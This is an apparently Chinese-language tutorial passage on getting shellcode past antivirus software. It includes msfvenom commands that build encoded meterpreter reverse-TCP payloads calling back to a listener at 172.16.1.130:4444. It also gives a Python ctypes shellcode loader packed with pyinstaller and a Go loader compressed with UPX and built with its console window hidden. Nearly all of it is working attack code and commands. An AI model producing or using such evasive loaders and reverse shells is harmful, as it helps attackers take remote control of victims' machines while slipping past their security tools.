shellcode loader
借助第三方加载器,将shellcode加载到内存中来执行。
https://github.com/clinicallyinane/shellcode_launcher
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
靶机执行
shellcode_launcher.exe -i test.c
msf监听正常上线
csc和InstallUtil
不再赘述,参考上文白加黑
偏僻语言
实际上也不能说偏僻语言,原理是让杀软不识别文件的pe头。我们在这说两种
pyinstaller
py版的shellcode模板
#! /usr/bin/env python
# encoding:utf-8
import ctypes
def execute():
# Bind shell
shellcode = bytearray(
"xbex24x6ex0cx71xdaxc8xd9x74x24xf4x5bx29"
...
"x37xa5x48xeax47xf6x81x90x07xc6x62x9ax56"
"x13"
)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
ctypes.c_int(-1))
if __name__ == "__main__":
execute()
msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=172.16.1.130 -e x86/shikata_ga_nai -i 5 -f py -o 1.py
使用pyinstaller打包
pyinstaller.py -F --console 1.py
和pyinstaller类似的还有py2exe,不再赘述。
go+upx
package main
import "C"
import "unsafe"
func main() {
buf := ""
buf += "xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"
...省略...
buf += "xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"
// at your call site, you can send the shellcode directly to the C
// function by converting it to a pointer of the correct type.
shellcode := []byte(buf)
C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
如果正常编译体积会很大,建议使用go build -ldflags="-s -w"参数来编译生成exe,你也可以go build -ldflags="-H windowsgui -s -w"去掉命令窗口
编译出来900多kb,在使用upx压缩一下会降低到200kb左右,也能正常上线。